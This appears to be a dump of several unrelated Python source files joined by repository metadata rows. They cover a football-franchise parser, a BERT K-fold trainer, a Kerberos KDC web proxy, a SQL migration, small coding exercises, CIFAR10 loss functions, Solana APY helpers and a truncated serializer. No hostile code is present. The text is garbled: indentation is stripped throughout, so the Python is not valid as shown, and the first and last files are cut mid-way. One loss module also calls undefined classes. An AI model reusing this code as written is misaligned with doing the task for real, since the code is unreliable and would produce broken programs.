for franchise in pfrFranchises.values():
franchiseName = deunicode(franchise.get("fullName")) or deunicode(franchise.get("name"))
if not franchise.get("fullName"): franchise["fullName"] = franchiseName
franchiseName = franchise["fullName"]
franchise["fromYear"] = franchise["from"]
del(franchise["from"])
franchise["toYear"] = franchise["to"]
del(franchise["to"])
for team in franchise["teams"].values():
teamName = deunicode(team.get("fullName")) or deunicode(team.get("name"))
# abbrev - NFL official abbreviation
# id - identifier for the team, used by espn, relative to pfr
abbrev = id = deunicode(franchise["abbrev"])
active = team.get("active") == True
aliases = team.get("aliases") or []
if active:
for inactiveTeam in franchise["teams"].values():
if inactiveTeam.get("active") == True: continue
inactiveName = deunicode(inactiveTeam.get("fullName")) or deunicode(inactiveTeam.get("name")) or ""
if inactiveName:
aliases.append(inactiveName)
if team.get("city"):
if inactiveName[:len(team["city"])] == team["city"]:
# Get any deadname cities
aliases.append(deunicode(inactiveName[:len(team["city"])].strip()))
if abbrev in pfr_abbreviation_corrections.keys():
if active: aliases.append(abbrev)
abbrev = pfr_abbreviation_corrections[abbrev]
team["aliases"] = list(set(aliases))
team["key"] = uuid.uuid4()
if active:
team["abbreviation"] = abbrev
else:
team["fullName"] = teamName
del(team["name"])
prefix = abbrev
franchisePrefix = strip_to_capitals(franchiseName)
if prefix != franchisePrefix: prefix = "%s.%s" % (prefix, franchisePrefix)
id = prefix
suffix = strip_to_capitals(teamName)
if suffix != franchisePrefix:
id = "%s.%s" % (prefix, suffix)
if team.get("abbreviation"): del(team["abbreviation"])
team["ProFootballReferenceID"] = id
team["identity"] = {"ProFootballReferenceID": id}
yrs = list(team["years"])
team["years"] = []
for span in yrs:
team["years"].append({"fromYear":span["from"], "toYear":span["to"]})
assets = dict()
if franchise.get("logo"):
assets.setdefault("logo", [])
assets["logo"].append({"source": "profootballreference", "url": deunicode(franchise["logo"])})
if team.get("years"):
for span in team["years"]:
for year in range(int(span["fromYear"]), int(span["toYear"])+1):
season = str(year)
if team.get(season) and team[season].get("logo"):
assets.setdefault("logo", [])
assets["logo"].append({"source": "profootballreference", "season": season, "url": deunicode(team[season]["logo"])})
if assets:
team["assets"] = assets
return pfrFranchises
| 29.224 | 123 | 0.636463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 894 | 0.24473 |
1d21e44ef2cd9394beeecb747e4069887cb35e0e | 9,565 | py | Python | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | 1 | 2020-10-25T03:43:57.000Z | 2020-10-25T03:43:57.000Z | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | null | null | null | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import time
import datetime
import random
from Kfold import KFold
from split_data import DataManager
from transformers import BertTokenizer
from transformers import BertTokenizer
from torch.utils.data import TensorDataset, random_split
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import BertForSequenceClassification, AdamW, BertConfig
from transformers import get_linear_schedule_with_warmup
class KfoldBERTData(DataManager):
def __init__(self, data, labels, num_folds):
super().__init__(data, labels, num_folds)
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)
def pre_process(self, sentences, labels):
max_len = 0
for sent in sentences:
input_ids = self.tokenizer.encode(sent, add_special_tokens=True)
max_len = max(max_len, len(input_ids))
input_ids = []
attention_masks = []
for sent in sentences:
encoded_dict = self.tokenizer.encode_plus(
sent,
add_special_tokens = True,
max_length = 350,
pad_to_max_length = True,
return_attention_mask = True,
return_tensors = 'pt',
truncation=True
)
input_ids.append(encoded_dict['input_ids'])
attention_masks.append(encoded_dict['attention_mask'])
# Convert the lists into tensors.
input_ids = torch.cat(input_ids, dim=0)
attention_masks = torch.cat(attention_masks, dim=0)
labels = torch.tensor(labels)
dataset = TensorDataset(input_ids, attention_masks, labels)
d, _ = random_split(dataset, [len(dataset), 0])
return d
class KfoldBERT(KFold):
def __init__(self, data, labels, num_folds):
super().__init__(data, labels, num_folds)
self.batch_size = 8
self.epochs = 10
self.data = KfoldBERTData(data, labels, num_folds)
if torch.cuda.is_available():
self.device = torch.device("cuda")
def flat_accuracy(self, preds, labels):
pred_flat = np.argmax(preds, axis=1).flatten()
labels_flat = labels.flatten()
return np.sum(pred_flat == labels_flat) / len(labels_flat)
def format_time(self, time):
'''
Takes a time in seconds and returns a string hh:mm:ss
'''
elapsed_rounded = int(round((time)))
return str(datetime.timedelta(seconds=elapsed_rounded))
def train(self, train_dataset, val_dataset):
train_dataloader = DataLoader(
train_dataset, # The training samples.
sampler = RandomSampler(train_dataset), # Select batches randomly
batch_size = self.batch_size # Trains with this batch size.
)
validation_dataloader = DataLoader(
val_dataset, # The validation samples.
sampler = SequentialSampler(val_dataset), # Pull out batches sequentially.
batch_size = self.batch_size # Evaluate with this batch size.
)
model = BertForSequenceClassification.from_pretrained(
"bert-base-uncased", # Use the 12-layer BERT model, with an uncased vocab.
num_labels = 4, # The number of output labels--2 for binary classification.
# You can increase this for multi-class tasks.
output_attentions = False, # Whether the model returns attentions weights.
output_hidden_states = False, # Whether the model returns all hidden-states.
)
model.cuda()
optimizer = AdamW(model.parameters(),
lr = 2e-5, # args.learning_rate - default is 5e-5, our notebook had 2e-5
eps = 1e-8 # args.adam_epsilon - default is 1e-8.
)
total_steps = len(train_dataloader) * self.epochs
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps = 0, # Default value in run_glue.py
num_training_steps = total_steps)
seed_val = 42
random.seed(seed_val)
np.random.seed(seed_val)
torch.manual_seed(seed_val)
torch.cuda.manual_seed_all(seed_val)
training_stats = []
# Measure the total training time for the whole run.
total_t0 = time.time()
# For each epoch...
for epoch_i in range(0, self.epochs):
print("")
print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, self.epochs))
print('Training...')
t0 = time.time()
total_train_loss = 0
model.train()
# For each batch of training data...
for step, batch in enumerate(train_dataloader):
# Progress update every 40 batches.
if step % 40 == 0 and not step == 0:
# Calculate elapsed time in minutes.
elapsed = self.format_time(time.time() - t0)
# Report progress.
print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))
b_input_ids = batch[0].to(self.device)
b_input_mask = batch[1].to(self.device)
b_labels = batch[2].to(self.device)
model.zero_grad()
loss, logits = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask,
labels=b_labels)
total_train_loss += loss.item()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
# Calculate the average loss over all of the batches.
avg_train_loss = total_train_loss / len(train_dataloader)
# Measure how long this epoch took.
training_time = self.format_time(time.time() - t0)
print("")
print(" Average training loss: {0:.2f}".format(avg_train_loss))
print(" Training epcoh took: {:}".format(training_time))
# ========================================
# Validation
# ========================================
# After the completion of each training epoch, measure our performance on
# our validation set.
print("")
print("Running Validation...")
t0 = time.time()
model.eval()
# Tracking variables
total_eval_accuracy = 0
total_eval_loss = 0
nb_eval_steps = 0
for batch in validation_dataloader:
b_input_ids = batch[0].to(self.device)
b_input_mask = batch[1].to(self.device)
b_labels = batch[2].to(self.device)
with torch.no_grad():
loss, logits = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask,
labels=b_labels)
# Accumulate the validation loss.
total_eval_loss += loss.item()
# Move logits and labels to CPU
logits = logits.detach().cpu().numpy()
label_ids = b_labels.to('cpu').numpy()
# Calculate the accuracy for this batch of test sentences, and
# accumulate it over all batches.
total_eval_accuracy += self.flat_accuracy(logits, label_ids)
# Report the final accuracy for this validation run.
avg_val_accuracy = total_eval_accuracy / len(validation_dataloader)
print(" Accuracy: {0:.2f}".format(avg_val_accuracy))
# Calculate the average loss over all of the batches.
avg_val_loss = total_eval_loss / len(validation_dataloader)
# Measure how long the validation run took.
validation_time = self.format_time(time.time() - t0)
print(" Validation Loss: {0:.2f}".format(avg_val_loss))
print(" Validation took: {:}".format(validation_time))
# Record all statistics from this epoch.
training_stats.append(
{
'epoch': epoch_i + 1,
'Training Loss': avg_train_loss,
'Valid. Loss': avg_val_loss,
'Valid. Accur.': avg_val_accuracy,
'Training Time': training_time,
'Validation Time': validation_time
}
)
torch.save(model.state_dict(), "removed_model_epoch_" + str(epoch_i + 1) +".pth")
print("")
print("Training complete!")
print("Total training took {:} (h:mm:ss)".format(self.format_time(time.time()-total_t0)))
return avg_val_accuracy, avg_val_loss
| 40.529661 | 118 | 0.540408 | 9,086 | 0.949922 | 0 | 0 | 0 | 0 | 0 | 0 | 2,022 | 0.211396 |
1d224808f2a6914ef8278b9e81b293979d0a85e1 | 7,957 | py | Python | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# pylint: disable=invalid-name
""" Web-based proxy to a Kerberos KDC for Webathena. """
import base64
import json
import os
import select
import socket
import dns.resolver
from pyasn1.codec.der import decoder as der_decoder
from pyasn1.codec.der import encoder as der_encoder
from pyasn1.error import PyAsn1Error
from werkzeug.exceptions import HTTPException
from werkzeug.routing import Map, Rule
from werkzeug.wrappers import Request, Response
import krb_asn1
import settings
# This is the same limit used internally in MIT Kerberos it seems.
MAX_PACKET_SIZE = 4096
# How many bytes of randomness to return
URANDOM_BYTES = 1024 // 8
def wait_on_sockets(socks, timeout):
"""
Selects on a list of UDP sockets until one becomes readable or we
hit a timeout. If one returns a packet we return it. Otherwise
None.
"""
ready_r, _, _ = select.select(socks, [], [], timeout)
for sock in ready_r:
data = sock.recv(MAX_PACKET_SIZE)
if data:
return data
return None
# Algorithm borrowed from MIT kerberos code. This probably works or
# something.
def send_request(socks, data):
"""
Attempts to send a single request to a number of UDP sockets until
one returns or we timeout. Handles retry.
"""
delay = 2
for _ in range(3):
for sock in socks:
# Send the request.
ret = sock.send(data)
if ret == len(data):
# Wait for a reply for a second.
reply = wait_on_sockets(socks, 1)
if reply is not None:
return reply
# Wait for a reply from anyone.
reply = wait_on_sockets(socks, delay)
if reply is not None:
return reply
delay *= 2
return None
class WebKDC:
def __init__(self, realm=settings.REALM):
self.realm = realm
self.url_map = Map([
Rule('/v1/AS_REQ', endpoint=('AS_REQ', krb_asn1.AS_REQ), methods=['POST']),
Rule('/v1/TGS_REQ', endpoint=('TGS_REQ', krb_asn1.TGS_REQ), methods=['POST']),
Rule('/v1/AP_REQ', endpoint=('AP_REQ', krb_asn1.AP_REQ), methods=['POST']),
Rule('/v1/urandom', endpoint=self.handle_urandom, methods=['POST']),
])
@staticmethod
def validate_AS_REQ(req_asn1):
msg_type = int(req_asn1.getComponentByName('msg-type'))
if msg_type != krb_asn1.KDC_REQ.msg_type_as:
raise ValueError('Bad msg-type')
@staticmethod
def validate_TGS_REQ(req_asn1):
msg_type = int(req_asn1.getComponentByName('msg-type'))
if msg_type != krb_asn1.KDC_REQ.msg_type_tgs:
raise ValueError('Bad msg-type')
@staticmethod
def validate_AP_REQ(req_asn1):
pass
@staticmethod
def _error_response(e):
""" Returns a Response corresponding to some exception e. """
data = {'status': 'ERROR', 'msg': str(e)}
return Response(json.dumps(data), mimetype='application/json')
@staticmethod
def handle_urandom():
random = os.urandom(URANDOM_BYTES)
# FIXME: We probably should be using a constant-time encoding
# scheme here...
return Response(
base64.b64encode(random),
mimetype='application/base64',
headers=[('Content-Disposition',
'attachment; filename="b64_response.txt"')])
def proxy_kdc_request(self, request, endpoint):
"""
Common code for all proxied KDC requests. endpoint is a
(req_name, asn1Type) tuple and comes from the URL map. req_b64
is base64-encoded request. Calls self.validate_${req_name} to
perform additional checks before sending it along.
"""
req_name, asn1Type = endpoint
# Werkzeug docs make a big deal about memory problems if the
# client sends you MB of data. So, fine, we'll limit it.
length = request.headers.get('Content-Length', type=int)
if length is None or length > MAX_PACKET_SIZE * 2:
return self._error_response('Payload too large')
req_b64 = request.data
try:
req_der = base64.b64decode(req_b64)
except TypeError as e:
return self._error_response(e)
# Make sure we don't send garbage to the KDC. Otherwise it
# doesn't reply and we time out, which is kinda awkward.
try:
req_asn1, rest = der_decoder.decode(req_der,
asn1Spec=asn1Type())
if rest:
raise ValueError('Garbage after request')
getattr(self, 'validate_' + req_name)(req_asn1)
except (PyAsn1Error, ValueError) as e:
return self._error_response(e)
# Okay, it seems good. Go on and send it, reencoded.
krb_rep = self.send_krb_request(
der_encoder.encode(req_asn1),
use_master='use_master' in request.args)
if krb_rep is None:
data = {'status': 'TIMEOUT'}
else:
# TODO: The JSON wrapping here is really kinda
# pointless. Just make this base64 and report errors with
# HTTP status codes + JSON or whatever.
data = {'status': 'OK', 'reply': base64.b64encode(krb_rep).decode('ascii')}
# Per Tangled Web, add a defensive Content-Disposition to
# prevent an extremely confused browser from interpreting this
# as HTML. Though even navigating to this would be pretty
# difficult as we require a random header be sent.
return Response(
json.dumps(data),
mimetype='application/json',
headers=[('Content-Disposition',
'attachment; filename="json_response.txt"')])
def send_krb_request(self, krb_req, use_master):
"""
Sends Kerberos request krb_req, returns the response or None
if we time out. If use_master is true, we only talk to the
master KDC.
"""
svctype = '_kerberos-master' if use_master else '_kerberos'
# TODO: Support TCP as well as UDP. I think MIT's KDC only
# supports UDP though.
socktype = '_udp'
srv_query = '%s.%s.%s' % (svctype, socktype, self.realm)
srv_records = list(getattr(dns.resolver, 'resolve', dns.resolver.query)(srv_query, 'SRV'))
srv_records.sort(key=lambda r: r.priority)
socks = []
try:
for r in srv_records:
host = str(r.target)
port = int(r.port)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setblocking(0)
s.connect((host, port))
socks.append(s)
return send_request(socks, krb_req)
finally:
for s in socks:
s.close()
def dispatch_request(self, request):
adapter = self.url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
if callable(endpoint):
return endpoint()
return self.proxy_kdc_request(request, endpoint, **values)
except HTTPException as e:
return e
def wsgi_app(self, environ, start_response):
request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def create_app():
return WebKDC()
def main():
# pylint: disable=import-outside-toplevel
import sys
from werkzeug.serving import run_simple
app = create_app()
ip = '127.0.0.1'
port = 5000
if len(sys.argv) > 1:
ip, port = sys.argv[1].rsplit(':', 1)
port = int(port)
run_simple(ip, port, app, use_debugger=True, use_reloader=True)
if __name__ == '__main__':
main()
| 34.150215 | 98 | 0.613045 | 5,727 | 0.719744 | 0 | 0 | 1,110 | 0.1395 | 0 | 0 | 2,574 | 0.323489 |
1d248c7603b5f2ad59f69f3e1de31b7ccc44d34b | 1,980 | py | Python | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 22 | 2015-04-09T09:00:00.000Z | 2022-03-23T00:16:04.000Z | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 119 | 2015-02-11T21:39:27.000Z | 2021-07-27T23:04:49.000Z | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 7 | 2016-03-16T11:53:45.000Z | 2022-02-24T13:47:31.000Z | # -*- coding: utf8 -*-
#
# DB migration 001 by 2017-11-03
#
# New statistics for subvolume - root diff in blocks / bytes
#
__author__ = 'sergey'
__NUMBER__ = 20171103001
def run(manager):
"""
:param manager: Database manager
:type manager: dedupsqlfs.db.sqlite.manager.DbManager|dedupsqlfs.db.mysql.manager.DbManager
:return: bool
"""
try:
table_sv = manager.getTable("subvolume")
"""
:type table_sv: dedupsqlfs.db.sqlite.table.subvolume.TableSubvolume |
dedupsqlfs.db.mysql.table.subvolume.TableSubvolume
"""
from dedupsqlfs.lib.constants import ROOT_SUBVOLUME_NAME
cur = table_sv.getCursor()
manager.getLogger().info("Migration #%s" % (__NUMBER__,))
if not table_sv.hasField('root_diff'):
if manager.TYPE == "sqlite":
cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff` TEXT;")
if manager.TYPE == "mysql":
cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff` TEXT;")
if not table_sv.hasField('root_diff_at'):
if manager.TYPE == "sqlite":
cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff_at` INTEGER;")
if manager.TYPE == "mysql":
cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff_at` INT UNSIGNED;")
table_sv.commit()
table_sv.close()
except Exception as e:
import traceback
manager.getLogger().error("Migration #%s error: %s" % (__NUMBER__, e,))
manager.getLogger().error("Migration #%s trace:\n%s" % (__NUMBER__, traceback.format_exc(),))
return False
table_opts = manager.getTable("option")
table_opts.getCursor()
mignumber = table_opts.get("migration")
if not mignumber:
table_opts.insert("migration", __NUMBER__)
else:
table_opts.update("migration", __NUMBER__)
table_opts.commit()
return True
| 30 | 101 | 0.622222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 862 | 0.435354 |
1d268f5884d3edaa2ebd73f6bea09ab2e7e7400f | 582 | py | Python | tests/test_keywords.py | VeerendraNathLukkani/pytest_test | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 51 | 2018-04-26T09:02:38.000Z | 2021-11-21T10:57:32.000Z | tests/test_keywords.py | VeerendraNathLukkani/pytest_test | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 39 | 2017-12-20T14:27:33.000Z | 2018-04-05T22:45:12.000Z | tests/test_keywords.py | tierratelematics/pytest-play | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 5 | 2018-06-30T15:51:39.000Z | 2020-04-13T19:31:25.000Z | import pytest
@pytest.mark.parametrize("cli_options", [
('-k', 'notestdeselect',),
])
def test_autoexecute_yml_keywords_skipped(testdir, cli_options):
yml_file = testdir.makefile(".yml", """
---
markers:
- marker1
- marker2
---
- provider: python
type: assert
expression: "1"
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest(*cli_options)
result.assert_outcomes(passed=0, failed=0, error=0)
# Deselected, not skipped. See #3427
# result.assert_outcomes(skipped=1)
| 22.384615 | 64 | 0.685567 | 0 | 0 | 0 | 0 | 565 | 0.97079 | 0 | 0 | 227 | 0.390034 |
1d27314ab7fea8509c861472d1fd1cdbc7becfb3 | 224 | py | Python | python/find_largest_divisor.py | codevscolor/codevscolor | 35ef9042bdc86f45ef87795c35963b75fb64d5d7 | [
"Apache-2.0"
] | 6 | 2019-04-26T03:11:54.000Z | 2021-05-07T21:48:29.000Z | python/find_largest_divisor.py | akojif/codevscolor | 56db3dffeac8f8d76ff8fcf5656770f33765941f | [
"Apache-2.0"
] | null | null | null | python/find_largest_divisor.py | akojif/codevscolor | 56db3dffeac8f8d76ff8fcf5656770f33765941f | [
"Apache-2.0"
] | 26 | 2019-02-23T14:50:46.000Z | 2022-02-04T23:44:24.000Z | #1
num = int(input("Enter a number : "))
largest_divisor = 0
#2
for i in range(2, num):
#3
if num % i == 0:
#4
largest_divisor = i
#5
print("Largest divisor of {} is {}".format(num,largest_divisor))
| 18.666667 | 64 | 0.575893 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 58 | 0.258929 |
1d27a3363d2c72c8ff7fcb62450ccd526ce19065 | 1,532 | py | Python | lintcode/0008-rotate-string.py | runzezhang/Data-Structure-and-Algorithm-Notebook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | 1 | 2020-07-24T03:37:05.000Z | 2020-07-24T03:37:05.000Z | lintcode/0008-rotate-string.py | runzezhang/Code-NoteBook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | null | null | null | lintcode/0008-rotate-string.py | runzezhang/Code-NoteBook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | null | null | null | # Description
# 中文
# English
# Given a string(Given in the way of char array) and an offset, rotate the string by offset in place. (rotate from left to right)
# offset >= 0
# the length of str >= 0
# Have you met this question in a real interview?
# Example
# Example 1:
# Input: str="abcdefg", offset = 3
# Output: str = "efgabcd"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "efgabcd".
# Example 2:
# Input: str="abcdefg", offset = 0
# Output: str = "abcdefg"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "abcdefg".
# Example 3:
# Input: str="abcdefg", offset = 1
# Output: str = "gabcdef"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "gabcdef".
# Example 4:
# Input: str="abcdefg", offset =2
# Output: str = "fgabcde"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "fgabcde".
# Example 5:
# Input: str="abcdefg", offset = 10
# Output: str = "efgabcd"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "efgabcd".
class Solution:
"""
@param str: An array of char
@param offset: An integer
@return: nothing
"""
def rotateString(self, s, offset):
# write your code here
if len(s) > 0:
offset = offset % len(s)
temp = (s + s)[len(s) - offset : 2 * len(s) - offset]
for i in range(len(temp)):
s[i] = temp[i] | 30.039216 | 129 | 0.640339 | 379 | 0.246745 | 0 | 0 | 0 | 0 | 0 | 0 | 1,238 | 0.80599 |
1d28dceef64377a9dfc091e14cb2bc5b41317fb7 | 5,854 | py | Python | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | null | null | null | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | 1 | 2018-10-18T18:49:33.000Z | 2018-10-18T18:49:33.000Z | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | 1 | 2018-10-18T20:59:18.000Z | 2018-10-18T20:59:18.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import ipdb
import time
# Clustering penalties
class ClusterLoss(torch.nn.Module):
"""
Cluster loss comes from the SuBiC paper and consists of two losses. First is the Mean Entropy
Loss which makes the output to be close to one-hot encoded vectors.
Second is the Negative Batch Entropy Loss which ensures a uniform distribution of activations
over the output (Uniform block support).
"""
def __init__(self):
super(ClusterLoss, self).__init__()
def entropy(self, logits):
return -1.0*(F.softmax(logits,dim=0)*F.log_softmax(logits,dim=0)).sum()
def forward(self, logits):
"""
Input: logits -> T x K # Where K is the number of classes and T is the batch size
Output: L = MEL, BEL
"""
# Mean Entropy Loss - For one-hotness
# L1 = Sum_batch_i(Sum_block_m(Entropy(block_i_m)))/TM
sum1 = torch.zeros([logits.shape[0],1])
for t in range(logits.shape[0]):
sum1[t] = self.entropy(logits[t,:])
L1 = torch.mean(sum1)
# Batch Entropy Loss - For uniform support
# L2 = -Sum_block_m(Entropy(Sum_batch_i(block_i_m)/T))/M
mean_output = torch.mean(logits, dim=0)
L2 = -1.0*self.entropy(mean_output)
return L1.cuda(), L2.cuda()
# Stochastic Transformation Stability Loss. Introduced in:
# "Regularization With Stochastic Transformations and Perturbations for Deep Semi-Supervised
# Learning"
class StochasticTransformationLoss(torch.nn.Module):
"""
The idea behind this is that stochastic transformations of an image (flips and translations)
should lead to very close features
"""
def __init__(self):
super(StochasticTransformationLoss, self).__init__()
def entropy(self, logits):
"""
Input: logits -> N x 1 x D # Where D is the feature dimension
Output: entropy -> N x 1
"""
# TODO
# Check is this is correct
return -1.0*(F.softmax(logits,dim=-1)*F.log_softmax(logits,dim=-1)).sum(-1)
def cross_entropy(self, logits1, logits2):
"""
Input: logits1 -> N x 1 x D # Where D is the feature dimension
logits2 -> 1 x N x D # Where D is the feature dimension
Output: Pairwise Cross-entropy -> N x N
"""
# TODO
# Check is this is correct
return -1.0*(F.softmax(logits1,dim=-1)*F.log_softmax(logits2,dim=-1)).sum(-1)
def distances(self, A, distance_type='Euclidean', eps=1e-6):
"""
Input: A -> num_transformations x D # Where D is the feature dimension
distance_type -> 'Euclidean'/'cosine'/'KL'
Output: distances -> num_transformations x num_transformations pair wise distances
"""
assert A.dim() == 2
if distance_type == 'Euclidean':
# 1. Numerically stable but too much memory?
B = A.unsqueeze(1)
C = A.unsqueeze(0)
differences = B - C
distances = torch.sum(differences*differences,-1) # N x N
# Do we need sqrt? - Paper doesn't do sqrt
# 2. Less memory but numerically unstable due to rounding errors
#A_norm_1 = (A**2).sum(1).view(-1,1)
#A_norm_2 = A_norm_1.view(1,-1)
#distances = A_norm_1 + A_norm_2 - 2.0*torch.matmul(A, torch.transpose(A,0,1))
elif distance_type == 'cosine':
B = F.normalize(A, p=2, dim=1)
distances = 1.0 - torch.matmul(B,B.t()) # N x N
elif distance_type == 'KL':
# Make sure that A contains logits
B = A.unsqueeze(1)
C = A.unsqueeze(0)
# TODO
# Might have to use a symmetric KL div
# Check - Still probably incorrect. Probably due to incorrect cross_entropy
# implementation
distances = -1.0*self.entropy(B) + self.cross_entropy(B,C) # N x N
return distances
def forward(self, features, num_transformations, distance_type='Euclidean'):
"""
Input: features -> T x D # Where D is the feature dimension and T is the batch size
num_transformations -> Number of transformations applied to the data
(Make sure that T is a multiple of num_transformations)
Output: ST Loss
"""
batch_size = features.shape[0]
#split_features = torch.zeros([batch_size/num_transformations, num_transformations, features.shape[1]])
all_index_groups = [[(i*num_transformations)+j for j in range(num_transformations)] for i in range(batch_size/num_transformations)]
total_loss = 0.0
for i in range(len(all_index_groups)):
split_features = torch.index_select(features, 0, torch.cuda.LongTensor(all_index_groups[i]))
distances = self.distances(split_features,distance_type=distance_type)
total_loss += 0.5*torch.sum(distances)
total_loss = total_loss / (1.0*batch_size)
# Don't know how exactly should we average. Per pair? Per image?
return total_loss
def get_loss(loss_name = 'CE'):
if loss_name == 'CE':
# ignore_index ignores the samples which have label -1000. We specify the unsupervised images by
# label 1000
criterion = nn.CrossEntropyLoss(ignore_index = -1000).cuda()
elif loss_name == 'ClusterLoss':
criterion = ClusterLoss().cuda()
elif loss_name == 'LocalityLoss':
criterion = LocalityLoss().cuda()
elif loss_name == 'CAMLocalityLoss':
criterion = CAMLocalityLoss().cuda()
elif loss_name == 'LEL':
criterion = LocalityEntropyLoss().cuda()
elif loss_name == 'STLoss':
criterion = StochasticTransformationLoss().cuda()
return criterion
| 41.51773 | 139 | 0.625726 | 4,857 | 0.829689 | 0 | 0 | 0 | 0 | 0 | 0 | 2,768 | 0.472839 |
1d2a9842977980ab181e2ea21da18fb3dfcb4476 | 1,134 | py | Python | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 34 | 2021-05-08T08:43:05.000Z | 2022-03-30T03:03:45.000Z | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 5 | 2021-05-14T19:50:17.000Z | 2021-11-23T23:44:44.000Z | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 17 | 2021-05-10T21:42:25.000Z | 2022-02-23T18:03:31.000Z | import solana_rpc as rpc
def get_apr_from_rewards(rewards_data):
result = []
if rewards_data is not None:
if 'epochRewards' in rewards_data:
epoch_rewards = rewards_data['epochRewards']
for reward in epoch_rewards:
result.append({
'percent_change': reward['percentChange'],
'apr': reward['apr']
})
return result
def calc_single_apy(apr, percent_change):
epoch_count = apr / percent_change
result = ((1 + percent_change / 100) ** epoch_count - 1) * 100
return result
def calc_apy_list_from_apr(apr_per_epoch):
l_apy = []
for item in apr_per_epoch:
apy = calc_single_apy(item['apr'], item['percent_change'])
l_apy.append(apy)
return l_apy
def process(validators):
data = []
for validator in validators:
rewards_data = rpc.load_stake_account_rewards(validator['stake_account'])
apr_per_epoch = get_apr_from_rewards(rewards_data)
apy_per_epoch = calc_apy_list_from_apr(apr_per_epoch)
data.append(apy_per_epoch)
return data
| 24.652174 | 81 | 0.641093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 105 | 0.092593 |
1d2bb1990a65ce8c94ef800f677963660b1de9dc | 5,545 | py | Python | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.core.urlresolvers import reverse
from rest_framework import serializers
from ralph_assets.models_dc_assets import (
DataCenter,
Rack,
RackAccessory,
RackOrientation,
)
from ralph_assets.models import Asset
TYPE_EMPTY = 'empty'
TYPE_ACCESSORY = 'accessory'
